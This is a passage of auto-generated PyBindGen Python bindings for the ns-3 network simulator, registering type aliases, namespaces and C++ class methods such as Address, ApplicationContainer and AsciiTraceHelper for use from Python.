typehandlers.add_type_alias('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >&', 'ns3::GenericPhyRxEndOkCallback&')
typehandlers.add_type_alias('ns3::SequenceNumber< unsigned short, short >', 'ns3::SequenceNumber16')
typehandlers.add_type_alias('ns3::SequenceNumber< unsigned short, short >*', 'ns3::SequenceNumber16*')
typehandlers.add_type_alias('ns3::SequenceNumber< unsigned short, short >&', 'ns3::SequenceNumber16&')
typehandlers.add_type_alias('ns3::SequenceNumber< unsigned int, int >', 'ns3::SequenceNumber32')
typehandlers.add_type_alias('ns3::SequenceNumber< unsigned int, int >*', 'ns3::SequenceNumber32*')
typehandlers.add_type_alias('ns3::SequenceNumber< unsigned int, int >&', 'ns3::SequenceNumber32&')
typehandlers.add_type_alias('ns3::RngSeedManager', 'ns3::SeedManager')
typehandlers.add_type_alias('ns3::RngSeedManager*', 'ns3::SeedManager*')
typehandlers.add_type_alias('ns3::RngSeedManager&', 'ns3::SeedManager&')
module.add_typedef(root_module['ns3::RngSeedManager'], 'SeedManager')
typehandlers.add_type_alias('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ns3::GenericPhyRxStartCallback')
typehandlers.add_type_alias('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >*', 'ns3::GenericPhyRxStartCallback*')
typehandlers.add_type_alias('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >&', 'ns3::GenericPhyRxStartCallback&')
typehandlers.add_type_alias('ns3::Callback< bool, ns3::Ptr< ns3::Packet >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ns3::GenericPhyTxStartCallback')
typehandlers.add_type_alias('ns3::Callback< bool, ns3::Ptr< ns3::Packet >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >*', 'ns3::GenericPhyTxStartCallback*')
typehandlers.add_type_alias('ns3::Callback< bool, ns3::Ptr< ns3::Packet >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >&', 'ns3::GenericPhyTxStartCallback&')
typehandlers.add_type_alias('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ns3::GenericPhyRxEndErrorCallback')
typehandlers.add_type_alias('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >*', 'ns3::GenericPhyRxEndErrorCallback*')
typehandlers.add_type_alias('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >&', 'ns3::GenericPhyRxEndErrorCallback&')
typehandlers.add_type_alias('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ns3::GenericPhyTxEndCallback')
typehandlers.add_type_alias('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >*', 'ns3::GenericPhyTxEndCallback*')
typehandlers.add_type_alias('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >&', 'ns3::GenericPhyTxEndCallback&')
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
## Register a nested module for the namespace addressUtils
nested_module = module.add_cpp_namespace('addressUtils')
register_types_ns3_addressUtils(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_types_ns3_addressUtils(module):
root_module = module.get_root()
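# Each register_Ns3*_methods call below attaches the Python-visible methods of
# one wrapped C++ class to the class object registered in register_types().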
def register_methods(root_module):
register_Ns3Address_methods(root_module, root_module['ns3::Address'])
register_Ns3ApplicationContainer_methods(root_module, root_module['ns3::ApplicationContainer'])
register_Ns3AsciiTraceHelper_methods(root_module, root_module['ns3::AsciiTraceHelper'])
register_Ns3AsciiTraceHelperForDevice_methods(root_module, root_module['ns3::AsciiTraceHelperForDevice'])
register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList'])
register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item'])
register_Ns3Buffer_methods(root_module, root_module['ns3::Buffer'])
register_Ns3BufferIterator_methods(root_module, root_module['ns3::Buffer::Iterator'])
register_Ns3ByteTagIterator_methods(root_module, root_module['ns3::ByteTagIterator'])
register_Ns3ByteTagIteratorItem_methods(root_module, root_module['ns3::ByteTagIterator::Item'])
register_Ns3ByteTagList_methods(root_module, root_module['ns3::ByteTagList'])
register_Ns3ByteTagListIterator_methods(root_module, root_module['ns3::ByteTagList::Iterator'])
register_Ns3ByteTagListIteratorItem_methods(root_module, root_module['ns3::ByteTagList::Iterator::Item'])
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3ChannelList_methods(root_module, root_module['ns3::ChannelList'])
register_Ns3DataRate_methods(root_module, root_module['ns3::DataRate'])
register_Ns3EventId_methods(root_module, root_module['ns3::EventId'])
register_Ns3Inet6SocketAddress_methods(root_module, root_module['ns3::Inet6SocketAddress'])
register_Ns3InetSocketAddress_methods(root_module, root_module['ns3::InetSocketAddress'])
register_Ns3Ipv4Address_methods(root_module, root_module['ns3::Ipv4Address'])
register_Ns3Ipv4Mask_methods(root_module, root_module['ns3::Ipv4Mask'])
register_Ns3Ipv6Address_methods(root_module, root_module['ns3::Ipv6Address'])
register_Ns3Ipv6Prefix_methods(root_module, root_module['ns3::Ipv6Prefix'])
register_Ns3Mac48Address_methods(root_module, root_module['ns3::Mac48Address'])
register_Ns3Mac64Address_methods(root_module, root_module['ns3::Mac64Address'])
register_Ns3NetDeviceContainer_methods(root_module, root_module['ns3::NetDeviceContainer'])
register_Ns3NodeContainer_methods(root_module, root_module['ns3::NodeContainer'])
register_Ns3NodeList_methods(root_module, root_module['ns3::NodeList'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter'])
register_Ns3ObjectFactory_methods(root_module, root_module['ns3::ObjectFactory'])
register_Ns3PacketMetadata_methods(root_module, root_module['ns3::PacketMetadata'])
register_Ns3PacketMetadataItem_methods(root_module, root_module['ns3::PacketMetadata::Item'])
register_Ns3PacketMetadataItemIterator_methods(root_module, root_module['ns3::PacketMetadata::ItemIterator'])
register_Ns3PacketSocketAddress_methods(root_module, root_module['ns3::PacketSocketAddress'])
register_Ns3PacketSocketHelper_methods(root_module, root_module['ns3::PacketSocketHelper'])
register_Ns3PacketTagIterator_methods(root_module, root_module['ns3::PacketTagIterator'])
register_Ns3PacketTagIteratorItem_methods(root_module, root_module['ns3::PacketTagIterator::Item'])
register_Ns3PacketTagList_methods(root_module, root_module['ns3::PacketTagList'])
register_Ns3PacketTagListTagData_methods(root_module, root_module['ns3::PacketTagList::TagData'])
register_Ns3PbbAddressTlvBlock_methods(root_module, root_module['ns3::PbbAddressTlvBlock'])
register_Ns3PbbTlvBlock_methods(root_module, root_module['ns3::PbbTlvBlock'])
register_Ns3PcapFile_methods(root_module, root_module['ns3::PcapFile'])
register_Ns3PcapHelper_methods(root_module, root_module['ns3::PcapHelper'])
register_Ns3PcapHelperForDevice_methods(root_module, root_module['ns3::PcapHelperForDevice'])
register_Ns3RandomVariable_methods(root_module, root_module['ns3::RandomVariable'])
register_Ns3RngSeedManager_methods(root_module, root_module['ns3::RngSeedManager'])
register_Ns3SequenceNumber32_methods(root_module, root_module['ns3::SequenceNumber32'])
register_Ns3SequenceNumber16_methods(root_module, root_module['ns3::SequenceNumber16'])
register_Ns3SequentialVariable_methods(root_module, root_module['ns3::SequentialVariable'])
register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
register_Ns3Simulator_methods(root_module, root_module['ns3::Simulator'])
register_Ns3SystemWallClockMs_methods(root_module, root_module['ns3::SystemWallClockMs'])
register_Ns3Tag_methods(root_module, root_module['ns3::Tag'])
register_Ns3TagBuffer_methods(root_module, root_module['ns3::TagBuffer'])
register_Ns3TriangularVariable_methods(root_module, root_module['ns3::TriangularVariable'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3UniformVariable_methods(root_module, root_module['ns3::UniformVariable'])
register_Ns3WeibullVariable_methods(root_module, root_module['ns3::WeibullVariable'])
register_Ns3ZetaVariable_methods(root_module, root_module['ns3::ZetaVariable'])
register_Ns3ZipfVariable_methods(root_module, root_module['ns3::ZipfVariable'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t'])
register_Ns3Chunk_methods(root_module, root_module['ns3::Chunk'])
register_Ns3ConstantVariable_methods(root_module, root_module['ns3::ConstantVariable'])
register_Ns3DeterministicVariable_methods(root_module, root_module['ns3::DeterministicVariable'])
register_Ns3EmpiricalVariable_methods(root_module, root_module['ns3::EmpiricalVariable'])
register_Ns3ErlangVariable_methods(root_module, root_module['ns3::ErlangVariable'])
register_Ns3ExponentialVariable_methods(root_module, root_module['ns3::ExponentialVariable'])
register_Ns3FlowIdTag_methods(root_module, root_module['ns3::FlowIdTag'])
register_Ns3GammaVariable_methods(root_module, root_module['ns3::GammaVariable'])
register_Ns3Header_methods(root_module, root_module['ns3::Header'])
register_Ns3IntEmpiricalVariable_methods(root_module, root_module['ns3::IntEmpiricalVariable'])
register_Ns3LlcSnapHeader_methods(root_module, root_module['ns3::LlcSnapHeader'])
register_Ns3LogNormalVariable_methods(root_module, root_module['ns3::LogNormalVariable'])
register_Ns3NormalVariable_methods(root_module, root_module['ns3::NormalVariable'])
register_Ns3Object_methods(root_module, root_module['ns3::Object'])
register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator'])
register_Ns3PacketBurst_methods(root_module, root_module['ns3::PacketBurst'])
register_Ns3ParetoVariable_methods(root_module, root_module['ns3::ParetoVariable'])
register_Ns3PcapFileWrapper_methods(root_module, root_module['ns3::PcapFileWrapper'])
register_Ns3Queue_methods(root_module, root_module['ns3::Queue'])
register_Ns3RadiotapHeader_methods(root_module, root_module['ns3::RadiotapHeader'])
register_Ns3RedQueue_methods(root_module, root_module['ns3::RedQueue'])
register_Ns3RedQueueStats_methods(root_module, root_module['ns3::RedQueue::Stats'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >'])
register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
register_Ns3SimpleRefCount__Ns3PbbAddressBlock_Ns3Empty_Ns3DefaultDeleter__lt__ns3PbbAddressBlock__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> >'])
register_Ns3SimpleRefCount__Ns3PbbMessage_Ns3Empty_Ns3DefaultDeleter__lt__ns3PbbMessage__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> >'])
register_Ns3SimpleRefCount__Ns3PbbPacket_Ns3Header_Ns3DefaultDeleter__lt__ns3PbbPacket__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> >'])
register_Ns3SimpleRefCount__Ns3PbbTlv_Ns3Empty_Ns3DefaultDeleter__lt__ns3PbbTlv__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3Socket_methods(root_module, root_module['ns3::Socket'])
register_Ns3SocketAddressTag_methods(root_module, root_module['ns3::SocketAddressTag'])
register_Ns3SocketFactory_methods(root_module, root_module['ns3::SocketFactory'])
register_Ns3SocketIpTtlTag_methods(root_module, root_module['ns3::SocketIpTtlTag'])
register_Ns3SocketSetDontFragmentTag_methods(root_module, root_module['ns3::SocketSetDontFragmentTag'])
register_Ns3Time_methods(root_module, root_module['ns3::Time'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3Trailer_methods(root_module, root_module['ns3::Trailer'])
register_Ns3Application_methods(root_module, root_module['ns3::Application'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3BooleanChecker_methods(root_module, root_module['ns3::BooleanChecker'])
register_Ns3BooleanValue_methods(root_module, root_module['ns3::BooleanValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3Channel_methods(root_module, root_module['ns3::Channel'])
register_Ns3DataRateChecker_methods(root_module, root_module['ns3::DataRateChecker'])
register_Ns3DataRateValue_methods(root_module, root_module['ns3::DataRateValue'])
register_Ns3DropTailQueue_methods(root_module, root_module['ns3::DropTailQueue'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3ErrorModel_methods(root_module, root_module['ns3::ErrorModel'])
register_Ns3EthernetHeader_methods(root_module, root_module['ns3::EthernetHeader'])
register_Ns3EthernetTrailer_methods(root_module, root_module['ns3::EthernetTrailer'])
register_Ns3EventImpl_methods(root_module, root_module['ns3::EventImpl'])
register_Ns3Ipv4AddressChecker_methods(root_module, root_module['ns3::Ipv4AddressChecker'])
register_Ns3Ipv4AddressValue_methods(root_module, root_module['ns3::Ipv4AddressValue'])
register_Ns3Ipv4MaskChecker_methods(root_module, root_module['ns3::Ipv4MaskChecker'])
register_Ns3Ipv4MaskValue_methods(root_module, root_module['ns3::Ipv4MaskValue'])
register_Ns3Ipv6AddressChecker_methods(root_module, root_module['ns3::Ipv6AddressChecker'])
register_Ns3Ipv6AddressValue_methods(root_module, root_module['ns3::Ipv6AddressValue'])
register_Ns3Ipv6PrefixChecker_methods(root_module, root_module['ns3::Ipv6PrefixChecker'])
register_Ns3Ipv6PrefixValue_methods(root_module, root_module['ns3::Ipv6PrefixValue'])
register_Ns3ListErrorModel_methods(root_module, root_module['ns3::ListErrorModel'])
register_Ns3Mac48AddressChecker_methods(root_module, root_module['ns3::Mac48AddressChecker'])
register_Ns3Mac48AddressValue_methods(root_module, root_module['ns3::Mac48AddressValue'])
register_Ns3NetDevice_methods(root_module, root_module['ns3::NetDevice'])
register_Ns3NixVector_methods(root_module, root_module['ns3::NixVector'])
register_Ns3Node_methods(root_module, root_module['ns3::Node'])
register_Ns3ObjectFactoryChecker_methods(root_module, root_module['ns3::ObjectFactoryChecker'])
register_Ns3ObjectFactoryValue_methods(root_module, root_module['ns3::ObjectFactoryValue'])
register_Ns3OutputStreamWrapper_methods(root_module, root_module['ns3::OutputStreamWrapper'])
register_Ns3Packet_methods(root_module, root_module['ns3::Packet'])
register_Ns3PacketSocket_methods(root_module, root_module['ns3::PacketSocket'])
register_Ns3PacketSocketFactory_methods(root_module, root_module['ns3::PacketSocketFactory'])
register_Ns3PbbAddressBlock_methods(root_module, root_module['ns3::PbbAddressBlock'])
register_Ns3PbbAddressBlockIpv4_methods(root_module, root_module['ns3::PbbAddressBlockIpv4'])
register_Ns3PbbAddressBlockIpv6_methods(root_module, root_module['ns3::PbbAddressBlockIpv6'])
register_Ns3PbbMessage_methods(root_module, root_module['ns3::PbbMessage'])
register_Ns3PbbMessageIpv4_methods(root_module, root_module['ns3::PbbMessageIpv4'])
register_Ns3PbbMessageIpv6_methods(root_module, root_module['ns3::PbbMessageIpv6'])
register_Ns3PbbPacket_methods(root_module, root_module['ns3::PbbPacket'])
register_Ns3PbbTlv_methods(root_module, root_module['ns3::PbbTlv'])
register_Ns3RandomVariableChecker_methods(root_module, root_module['ns3::RandomVariableChecker'])
register_Ns3RandomVariableValue_methods(root_module, root_module['ns3::RandomVariableValue'])
register_Ns3RateErrorModel_methods(root_module, root_module['ns3::RateErrorModel'])
register_Ns3ReceiveListErrorModel_methods(root_module, root_module['ns3::ReceiveListErrorModel'])
register_Ns3SimpleChannel_methods(root_module, root_module['ns3::SimpleChannel'])
register_Ns3SimpleNetDevice_methods(root_module, root_module['ns3::SimpleNetDevice'])
register_Ns3TimeChecker_methods(root_module, root_module['ns3::TimeChecker'])
register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
register_Ns3AddressChecker_methods(root_module, root_module['ns3::AddressChecker'])
register_Ns3AddressValue_methods(root_module, root_module['ns3::AddressValue'])
register_Ns3PbbAddressTlv_methods(root_module, root_module['ns3::PbbAddressTlv'])
return
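# The per-class helpers below all follow the same declarative PyBindGen
# pattern visible throughout this generated file: each one receives the class
# wrapper as `cls` and registers the C++ API with cls.add_constructor(...),
# cls.add_method(...), cls.add_instance_attribute(...) and operator helpers
# such as cls.add_binary_comparison_operator('=='). Each param(...) entry
# repeats the C++ type and parameter name quoted in the preceding `##` comment.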
def register_Ns3Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## address.h (module 'network'): ns3::Address::Address() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::Address::Address(uint8_t type, uint8_t const * buffer, uint8_t len) [constructor]
cls.add_constructor([param('uint8_t', 'type'), param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): ns3::Address::Address(ns3::Address const & address) [copy constructor]
cls.add_constructor([param('ns3::Address const &', 'address')])
## address.h (module 'network'): bool ns3::Address::CheckCompatible(uint8_t type, uint8_t len) const [member function]
cls.add_method('CheckCompatible',
'bool',
[param('uint8_t', 'type'), param('uint8_t', 'len')],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::CopyAllFrom(uint8_t const * buffer, uint8_t len) [member function]
cls.add_method('CopyAllFrom',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): uint32_t ns3::Address::CopyAllTo(uint8_t * buffer, uint8_t len) const [member function]
cls.add_method('CopyAllTo',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint8_t', 'len')],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::CopyFrom(uint8_t const * buffer, uint8_t len) [member function]
cls.add_method('CopyFrom',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): uint32_t ns3::Address::CopyTo(uint8_t * buffer) const [member function]
cls.add_method('CopyTo',
'uint32_t',
[param('uint8_t *', 'buffer')],
is_const=True)
## address.h (module 'network'): void ns3::Address::Deserialize(ns3::TagBuffer buffer) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'buffer')])
## address.h (module 'network'): uint8_t ns3::Address::GetLength() const [member function]
cls.add_method('GetLength',
'uint8_t',
[],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## address.h (module 'network'): bool ns3::Address::IsInvalid() const [member function]
cls.add_method('IsInvalid',
'bool',
[],
is_const=True)
## address.h (module 'network'): bool ns3::Address::IsMatchingType(uint8_t type) const [member function]
cls.add_method('IsMatchingType',
'bool',
[param('uint8_t', 'type')],
is_const=True)
## address.h (module 'network'): static uint8_t ns3::Address::Register() [member function]
cls.add_method('Register',
'uint8_t',
[],
is_static=True)
## address.h (module 'network'): void ns3::Address::Serialize(ns3::TagBuffer buffer) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'buffer')],
is_const=True)
return
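# Illustrative only: assuming these bindings are compiled into the conventional
# `ns.network` extension module, the registration above makes ns3::Address
# usable from Python roughly as sketched below (the package name is an
# assumption and depends on how the bindings are built and installed):
#
#   import ns.network                 # hypothetical import path for the built module
#   addr = ns.network.Address()       # default constructor registered above
#   print(addr.IsInvalid())           # query methods map one-to-one to the C++ API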
def register_Ns3ApplicationContainer_methods(root_module, cls):
## application-container.h (module 'network'): ns3::ApplicationContainer::ApplicationContainer(ns3::ApplicationContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ApplicationContainer const &', 'arg0')])
## application-container.h (module 'network'): ns3::ApplicationContainer::ApplicationContainer() [constructor]
cls.add_constructor([])
## application-container.h (module 'network'): ns3::ApplicationContainer::ApplicationContainer(ns3::Ptr<ns3::Application> application) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Application >', 'application')])
## application-container.h (module 'network'): ns3::ApplicationContainer::ApplicationContainer(std::string name) [constructor]
cls.add_constructor([param('std::string', 'name')])
## application-container.h (module 'network'): void ns3::ApplicationContainer::Add(ns3::ApplicationContainer other) [member function]
cls.add_method('Add',
'void',
[param('ns3::ApplicationContainer', 'other')])
## application-container.h (module 'network'): void ns3::ApplicationContainer::Add(ns3::Ptr<ns3::Application> application) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::Application >', 'application')])
## application-container.h (module 'network'): void ns3::ApplicationContainer::Add(std::string name) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'name')])
## application-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Application>*,std::vector<ns3::Ptr<ns3::Application>, std::allocator<ns3::Ptr<ns3::Application> > > > ns3::ApplicationContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Application > const, std::vector< ns3::Ptr< ns3::Application > > >',
[],
is_const=True)
## application-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Application>*,std::vector<ns3::Ptr<ns3::Application>, std::allocator<ns3::Ptr<ns3::Application> > > > ns3::ApplicationContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Application > const, std::vector< ns3::Ptr< ns3::Application > > >',
[],
is_const=True)
## application-container.h (module 'network'): ns3::Ptr<ns3::Application> ns3::ApplicationContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::Application >',
[param('uint32_t', 'i')],
is_const=True)
## application-container.h (module 'network'): uint32_t ns3::ApplicationContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
## application-container.h (module 'network'): void ns3::ApplicationContainer::Start(ns3::Time start) [member function]
cls.add_method('Start',
'void',
[param('ns3::Time', 'start')])
## application-container.h (module 'network'): void ns3::ApplicationContainer::Stop(ns3::Time stop) [member function]
cls.add_method('Stop',
'void',
[param('ns3::Time', 'stop')])
return
def register_Ns3AsciiTraceHelper_methods(root_module, cls):
## trace-helper.h (module 'network'): ns3::AsciiTraceHelper::AsciiTraceHelper(ns3::AsciiTraceHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AsciiTraceHelper const &', 'arg0')])
## trace-helper.h (module 'network'): ns3::AsciiTraceHelper::AsciiTraceHelper() [constructor]
cls.add_constructor([])
## trace-helper.h (module 'network'): ns3::Ptr<ns3::OutputStreamWrapper> ns3::AsciiTraceHelper::CreateFileStream(std::string filename, std::_Ios_Openmode filemode=std::ios_base::out) [member function]
cls.add_method('CreateFileStream',
'ns3::Ptr< ns3::OutputStreamWrapper >',
[param('std::string', 'filename'), param('std::_Ios_Openmode', 'filemode', default_value='std::ios_base::out')])
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultDequeueSinkWithContext(ns3::Ptr<ns3::OutputStreamWrapper> file, std::string context, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultDequeueSinkWithContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('std::string', 'context'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultDequeueSinkWithoutContext(ns3::Ptr<ns3::OutputStreamWrapper> file, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultDequeueSinkWithoutContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultDropSinkWithContext(ns3::Ptr<ns3::OutputStreamWrapper> file, std::string context, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultDropSinkWithContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('std::string', 'context'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultDropSinkWithoutContext(ns3::Ptr<ns3::OutputStreamWrapper> file, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultDropSinkWithoutContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultEnqueueSinkWithContext(ns3::Ptr<ns3::OutputStreamWrapper> file, std::string context, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultEnqueueSinkWithContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('std::string', 'context'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultEnqueueSinkWithoutContext(ns3::Ptr<ns3::OutputStreamWrapper> file, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultEnqueueSinkWithoutContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultReceiveSinkWithContext(ns3::Ptr<ns3::OutputStreamWrapper> file, std::string context, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultReceiveSinkWithContext',
'void',
